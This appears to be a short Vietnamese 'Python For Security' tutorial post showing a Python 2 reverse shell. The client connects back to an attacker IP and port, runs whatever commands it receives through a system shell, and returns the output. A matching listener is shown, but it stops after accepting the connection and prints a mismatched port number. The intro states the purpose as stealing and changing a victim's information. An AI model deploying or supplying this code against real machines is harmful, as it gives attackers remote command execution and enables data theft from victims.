Ví dụ này demo lại quá trình tấn công vào máy nạn nhân và thực hiện các câu lệnh như: ipconfig, dir … nhằm mục đích đánh cắp và thay đổi thông tin.
Client
# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Basic TCP Client
import socket # For Building TCP Connection
import subprocess # To start the shell in the system
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's'
s.connect(('172.16.12.95', 8081)) # Here we define the Attacker IP and the listening port
while True: # keep receiving commands from the Kali machine
command = s.recv(1024) # read the first KB of the tcp socket
if 'terminate' in command: # if we got termiante order from the attacker, close the socket and break the loop
s.close()
break
else: # otherwise, we pass the received command to a shell process
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() ) # send back the result
s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error
def main ():
connect()
main()
Server
# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Simple TCP Server
import socket # For Building TCP Connection
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's'
s.bind(("172.16.12.95", 8081)) # define the kali IP and the listening port
s.listen(1) # define the backlog size, since we are expecting a single connection from a single
# target we will listen to one connection
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source
# port in a tuple format (IP,port)
Chúc các bạn thành công !
